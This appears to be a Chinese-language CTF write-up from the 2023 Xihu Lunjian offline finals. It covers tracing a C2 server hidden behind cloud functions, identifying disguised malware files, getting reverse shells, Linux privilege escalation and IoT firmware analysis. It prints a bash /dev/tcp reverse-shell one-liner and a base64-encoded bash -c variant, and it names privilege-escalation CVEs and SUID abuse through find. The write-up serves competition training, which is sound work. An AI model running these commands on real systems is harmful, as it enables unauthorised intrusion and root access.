2023西湖论剑线下决赛的一些小总结

WriteUp 1年前 (2023) admin
547 0 0

一、溯源使用了云函数的C2真实IP的思路

该题目是给了一个exe木马,要求获取其连接的真实IP,丢进沙箱发现它使用了云函数来隐藏teamserver:

2023西湖论剑线下决赛的一些小总结

使用云函数的样本没有特别好的溯源方法,不过也不是完全没机会,依靠网络空间测绘引擎,还是有可能的。

2023西湖论剑线下决赛的一些小总结

本质上是因为teamserver被网络空间搜索引擎识别到并解析出了beacon配置,其中含有云函数地址,所以可以被搜索到。

该方法有一定的局限性,如果目标服务器修改了默认异或密钥,就无法解析出beacon配置了;如果启用时间不长,搜索引擎没有收录,那也无法找到。

参考这种思路,也可以依据空间搜索引擎的全网扫描结果,结合手动确认,逐步缩小范围,最终定位真实teamserver地址。

二、排查未知文件的思路

这道题目也是比较贴近实战的,在应急响应工作中遇到的未知文件基本离不开木马、黑客工具这个范围,攻击者可能将其进行改名、混淆等,排查其作用的思路为:

1.先利用沙箱进行检测,如果仅修改名称,那么md5值不变,很多黑客工具都被放进沙箱检测过,这样就可以关联到其原始名称

2023西湖论剑线下决赛的一些小总结

2.放进虚拟机运行一下,某些工具会在帮助信息里输出名称、logo、调试信息等:

2023西湖论剑线下决赛的一些小总结

3.根据文件中硬编码的一些字符串确定:

2023西湖论剑线下决赛的一些小总结

三、反弹shell及提权

有道题目无法直接通过 bash -i >& /dev/tcp/ip/port 0>&1 来反弹shell,推测原因:

1.机器不出网

2.命令没成功执行

通过wget能成功访问到本地HTTP服务,排除机器不出网的情况,那么解决命令未成功执行的方法:

1.写入shell文件再执行

2.将命令编码执行:bash -c '{echo,<base64字符>}|{base64,-d}|{bash,-i}'

最终用第一种方法成功反弹。

还遇到了Linux提权相关题目,主要有两大常用思路:漏洞提权及suid提权.

漏洞如:

  • • Dirtycow(CVE-2016-5195)

  • • Dirtypipe(CVE-2022-0847)

  • • pkexec(CVE-2021-4034)

suid提权则使用https://gtfobins.github.io/查找,如该题使用find提权到root读取flag

2023西湖论剑线下决赛的一些小总结

四、IOT固件分析和串口使用

拿到题目是一个固件,可以使用binwalk直接解包

2023西湖论剑线下决赛的一些小总结

拿到文件系统进行分析

2023西湖论剑线下决赛的一些小总结

一开始可以通过使用串口可以进shell,使用SecureCRT工具连接串口,设置波特率115200

2023西湖论剑线下决赛的一些小总结

遇到串口调试无法拿shell时,可以通过固件重新打包,修改掉etc/passwd文件修改root用户的密码来使用ssh远程连接。



-END-

2023西湖论剑线下决赛的一些小总结如果本文对您有帮助,来个点赞在看就是对我们莫大的鼓励。2023西湖论剑线下决赛的一些小总结



  推荐关注:





2023西湖论剑线下决赛的一些小总结
弱口令安全实验室正式成立于2022年1月,是思而听(山东)网络科技有限公司旗下的网络安全研究团队,专注于网络攻防技术渗透测试硬件安全安全开发网络安全赛事以及网安线上教育领域研究几大板块。
团队社群氛围浓厚,同时背靠思而听(山东)网络科技有限公司旗下的“知行网络安全教育平台”作为社区,容纳同好在安全领域不断进行技术提升以及技术分享,从而形成良好闭环。

团队全员均持CISP-PTE(注册信息安全专业人员-渗透测试工程师)认证,积极参与着各类网络安全赛事并屡获佳绩,同时多次高水准的完成了国家级、省部级攻防演习活动以及相关重报工作,均得到甲方的一致青睐与肯定。

欢迎对网络安全技术感兴趣的你来加入我们实验室,可在公众号内依次点击【关于我们】-【加入我们】来获取联系方式~




原文始发于微信公众号(弱口令安全实验室):2023西湖论剑线下决赛的一些小总结

版权声明:admin 发表于 2023年4月5日 下午2:38。
转载请注明:2023西湖论剑线下决赛的一些小总结 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...